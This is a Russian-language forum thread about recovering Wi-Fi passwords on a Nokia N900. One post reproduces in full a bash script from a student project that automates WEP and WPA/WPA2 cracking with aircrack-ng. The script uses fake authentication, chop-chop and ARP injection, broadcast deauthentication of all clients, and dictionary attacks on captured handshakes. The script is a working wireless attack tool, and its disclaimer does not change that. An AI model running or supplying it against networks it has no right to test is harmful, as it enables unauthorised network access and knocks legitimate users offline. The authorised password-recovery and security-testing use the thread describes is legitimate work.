
Re: N900-crack (восстановление забытого пароля AP с помощью N900)

Хм...
Я правильно понимаю, что этот скрипт и aircrack "не дружат" с последними версиями kernel-power?


17 (16.12.2012 02:46:26 отредактировано ZrX)

Re: N900-crack (восстановление забытого пароля AP с помощью N900)

Не проще ли выложить скрипт прямо в шапку темы? Зачем его отдельно скачивать?

#! /bin/bash
#   n900crack.sh
#Middlesex University
#Author: Krystian Majda M00221109
#email: niervol@gmail.com or km857@live.mdx.ac.uk
#Date: 18 April 2011
#This bash script is a deliverable of the final year project, CCM3422.
#Project superviser: Dr Jonathan Loo
#Second superviser: Dr Robert Colson

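clear
echo "   n900crack.sh     -   by Krystian Majda   km857@live.mdx.ac.uk"
echo "          DISCLAIMER!!!"
echo "This script is intended for educational, testing and password recovery purposes."
echo "It is against the law to crack others networks."
echo "I DO NOT TAKE ANY RESPONSIBILITY FOR INCORRECT OR ILLEGAL USE OF THIS SCRIPT"
echo
echo "WEP & WPA/2 cracking automation script for Nokia N900"
echo "required: aircrack-ng v1.0 and injection drivers: wl1251-meamo"
echo

#directories and variables
# Working directory: scan output, the network list, capture files and the
# cracked key file are all written here.
crackdir="/home/user"
# Out-of-tree wl1251 driver build that provides packet injection; load.sh and
# unload.sh are expected in this directory and are run as root.
driverdir="/home/user/MyDocs/wl1251-maemo/binary/compat-wireless/"
scantime=20                      # seconds airodump-ng is left scanning per pass
nic="wlan0"
scanprefix="scan"
scanfile="$scanprefix-01.csv"    # airodump-ng appends "-01" to its first output file
networklist=networks.txt

# Stop any aircrack-ng suite processes still running in the background and
# unload the injection driver.  Registered on EXIT so that an interrupted run
# (Ctrl-C, or one of the early exits below) does not leave root-owned
# airodump-ng/aireplay-ng processes holding the radio in monitor mode.
cleanup() {
sudo killall -q airodump-ng aireplay-ng aircrack-ng
if cd "$driverdir" 2>/dev/null; then
sudo sh unload.sh >>/dev/null 2>&1
sleep 2
fi
}
trap cleanup EXIT

#load injection drivers
# The cd must succeed before anything is run with sudo: without this check a
# missing driver directory would make "sudo sh load.sh" execute whatever
# load.sh happens to be in the current directory, as root.
cd "$driverdir" || { echo "Driver directory $driverdir not found; cannot load injection drivers." >&2; exit 1; }
sudo sh load.sh >>/dev/null 2>&1

#change directory to crackdir
cd "$crackdir" || { echo "Cannot change to $crackdir" >&2; exit 1; }

########## scan & print loop #################
# choice must start at 0 or the loop condition is "[ '' -eq 0 ]", which is a
# test error (false) and the scan would never run.
choice=0
while [ "$choice" -eq 0 ]; do

#remove previous scannig data and networks list
# Only this script's own scan-*.csv files are removed ("$scan" was never
# defined, so the old "rm -f $scan*.csv" deleted every .csv in $crackdir).
rm -f "$scanprefix"-*.csv "$networklist"

#scan for available networks
sudo airodump-ng -w "$scanprefix" --output-format csv "$nic" >>/dev/null 2>&1 &
echo "Scaning in progres... Please wait..."
sleep "$scantime"
sudo killall -q airodump-ng

echo
echo "The following networks are available. Please note:"
echo "- Power field indicates signal level, the closer to 0 the better"
echo "- associated clent is required to crack WPA/WPA2, 'wordlist.txt' file is used for 
dictionary attack"

#print/list available networks
if [ ! -f "$scanfile" ]; then
echo "No scan output was produced - is $nic up and is the injection driver loaded?" >&2
fi
linenumber=1
# Read from the file directly (not via a pipe) so that linenumber survives
# the loop; read -r and quoting keep backslashes and glob characters in an
# ESSID from being interpreted (an ESSID of "*" used to expand to file names).
while IFS= read -r line; do
# Collapse runs of blanks the way the original unquoted echo did, so the
# stored list has the same "field, field" shape the later cuts expect.
row=$(printf '%s' "$line" | tr -s ' 	' ' ')
if printf '%s\n' "$line" | grep -q "  0."
then
#print networks with numbers and store in networklist
# "  0." is the original author's heuristic for access-point rows (observed
# in the "# IV"/"LAN IP" columns of AP rows); other rows are printed unnumbered.
# Stored fields: number, BSSID, channel, privacy, power, ESSID.  The ESSID is
# the last CSV column, so one containing a comma is truncated at that comma.
printf '%s\n' "0$linenumber ), $row" | cut -d, -f1,2,5,7,10,15 | tee -a "$networklist"
linenumber=$((linenumber + 1))
else
#print others without numbers
printf '%s\n' "$row" | cut -d, -f1,4,6,9,14
fi
done < "$scanfile"

#read choice from user input
read -r -p "Enter number of the network to crack or '0' to rescan: " choice
# Anything that is not a plain number (empty input included) means "rescan";
# the old code would have failed the -eq test and carried on with an empty MAC.
case $choice in
''|*[!0-9]*) choice=0 ;;
esac
clear
done
########### end of scan & print loop ############

#variables needed for attack
# Look the entry up once, anchored at the start of the line, so that choosing
# "1" selects "01 )," and not every entry whose number ends in 1.
entry=$(grep -m1 "^0*${choice#0} )," "$networklist" 2>/dev/null)
if [ -z "$entry" ]; then
echo "No network with number $choice in the scan list." >&2
exit 1
fi
apmac=$(printf '%s\n' "$entry" | cut -d, -f2 | tr -d ' ')
apchanel=$(printf '%s\n' "$entry" | cut -d, -f3 | tr -d ' ')
apencryption=$(printf '%s\n' "$entry" | cut -d, -f4)
apname=$(printf '%s\n' "$entry" | cut -d, -f6 | cut -c 2-)

# File-name-safe form of the ESSID, used for every capture and key file.
# The ESSID is attacker controlled (any AP can beacon any name), so it must
# not be used raw in paths: "../x", a leading "-" or an embedded "/" would
# turn the rm -f / airodump-ng -w / aircrack-ng -l calls below into deletes
# and writes elsewhere, or into extra command-line options.  Ordinary names
# ("MyWiFi") are unchanged; other characters become "_"; a hidden (empty)
# ESSID falls back to the BSSID.
outbase=${apname//[!A-Za-z0-9._-]/_}
case $outbase in
[-.]*) outbase="_$outbase" ;;
esac
[ -n "$outbase" ] || outbase=$(printf '%s' "$apmac" | tr -d ':-')

# MAC of our own radio, used as the source address of injected frames.  The
# original pipeline keeps the first six dash-separated bytes of the HWaddr
# field - presumably the UNSPEC form ifconfig prints for a monitor-mode
# interface (TODO confirm on the device); aireplay-ng accepts both ":" and
# "-" separators.  The result is validated so a parsing failure aborts here
# instead of surfacing as confusing aireplay-ng errors later.
sourcemac=$(sudo ifconfig | grep "$nic" | head -n1 | cut -d" " -f10 | cut -d- -f1,2,3,4,5,6)
if ! printf '%s\n' "$sourcemac" | grep -Eq '^([0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}$'; then
echo "Could not determine the MAC address of $nic from ifconfig (got '$sourcemac')." >&2
exit 1
fi

#decide on attack type
case "$apencryption" in

#unencrypted networks
*OPN*) echo "$apname" " is open/unencrypted!";;

############################################################################
# Cracking WEP

*WEP*) echo "Cracking WEP encryption of $apname network, please be patient"
echo "when successfully cracked, password will be displayed on the screen and saved to"
echo "$outbase.txt"

#WEP relevant variables
ivs=0
minivs=30000    # IV count the original author waits for before trying aircrack-ng

#removing previous files if existing
rm -f "$outbase-01.cap" "$outbase-01.csv" "$outbase-01.kismet.netxml"
rm -f "$outbase-01.kismet.csv" "$outbase.txt"
rm -f arp-request.cap
rm -f replay_dec*.xor
rm -f replay*.cap

#collecting #ivs
sudo airodump-ng -c "$apchanel" -w "$outbase" --bssid "$apmac" "$nic" >>/dev/null 2>&1 &
sleep 2

#fake authentication
# -e carries the real ESSID (protocol value), not the sanitised file name.
sudo aireplay-ng -1 900 -e "$apname" -a "$apmac" -h "$sourcemac" "$nic" >>/dev/null 2>&1 &
sleep 2

#chop chop attack to get PRGA
sudo aireplay-ng -4 -b "$apmac" -h "$sourcemac" -F "$nic"

#creating arp-request from PRGA
sudo packetforge-ng -0 -a "$apmac" -h "$sourcemac" -k 255.255.255.255 -l 255.255.255.255 -y replay_dec*.xor -w arp-request.cap

#injection of the arp packet
sudo aireplay-ng -2 -r arp-request.cap -h "$sourcemac" -F "$nic" >>/dev/null 2>&1 &

#waiting for minimum #ivs number
while [ "$ivs" -lt "$minivs" ]; do
sleep 30
# Column 11 of the airodump-ng CSV is "# IV".  The row is selected by BSSID
# rather than by ESSID so that a hidden (empty) ESSID, or a client row that
# probed for the same name, cannot match and yield a multi-line value.
ivs=$(grep -i -m1 "^$apmac," "$outbase-01.csv" 2>/dev/null | cut -d, -f11 | tr -d ' ')
ivs=${ivs:-0}
echo "$ivs of #ivs collected! Waiting for at least:  $minivs"
done

#attempting to crack every 120s with new #ivs every time and saving password to file
# Loops until aircrack-ng writes the key file; there is no upper bound, so a
# key that never cracks must be interrupted by hand (the EXIT trap cleans up).
while [ ! -f "$outbase.txt" ]; do
clear
sudo aircrack-ng -l "$outbase.txt" "$outbase-01.cap" &
sleep 120
sudo killall -q aircrack-ng
done

#kill no longer needed processes
sudo killall -q airodump-ng aireplay-ng

#outputing stored password if cracked
if [ -f "$outbase.txt" ]; then
echo "#########################################"
echo "  #######   Congratulations!   ########"
echo "The cracked password for $apname is: $(cat "$outbase.txt")"
fi
;; ##### end of WEP attack


#######################################################################
######## Cracking WPA/WPA2

*) echo "Cracking WPA/WPA2 encryption of $apname network"
echo "when successfully cracked, password will be displayed on the screen and saved to"
echo "$outbase.txt"

#WPA relevant variables
dictionary=wordlist.txt
handshake=handshake.txt    # airodump-ng screen output, watched for "WPA handshake"

# Check the wordlist before deauthenticating anybody: without it the capture
# would be useless and the clients would have been kicked for nothing.
if [ ! -f "$dictionary" ]; then
echo "Dictionary file $dictionary not found in $crackdir; cannot run the dictionary attack." >&2
exit 1
fi

#deleting previous files if existing
rm -f "$outbase-01.cap" "$outbase-01.csv" "$outbase-01.kismet.netxml"
rm -f "$outbase-01.kismet.csv" replay*.cap "$outbase.txt" "$handshake"

#catching handshake
sudo airodump-ng -c "$apchanel" -w "$outbase" --bssid "$apmac" "$nic" >>"$handshake" 2>&1 &
sleep 5

#deauthenticating clients until handshake captured
until grep -q "WPA handshake" "$handshake"; do
echo "Waiting for legitimate client and for full, valid 4-way handshake capture. Please, wait..."
#deathenticate client
sudo aireplay-ng -0 2 -a "$apmac" -c ffffffffffff "$nic" >>/dev/null 2>&1 &
sleep 15
done

#kill no longer needed processes to free-up some resources
sudo killall -q airodump-ng aireplay-ng

#brute-force the captured handshake against dictionary and save password to file
#computing power hungry
sudo aircrack-ng -l "$outbase.txt" -w "$dictionary" -b "$apmac" "$outbase-01.cap"

#output cracked password again from file if existing
if [ -f "$outbase.txt" ]; then
echo "#########################################"
echo "  #######   Congratulations!   ########"
echo "The cracked password for $apname is: $(cat "$outbase.txt")"
echo "Regularly changed, strong WPA password is recommende!"
else
echo "Unfortunately, password was not found in the provided dictionary: $dictionary"
fi
;; ####### end of WPA/WPA2 attack
esac

#unload the drivers
# Done by the EXIT trap (cleanup) so it also runs on Ctrl-C and early exits.
exit 0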
#end
живее всех живых

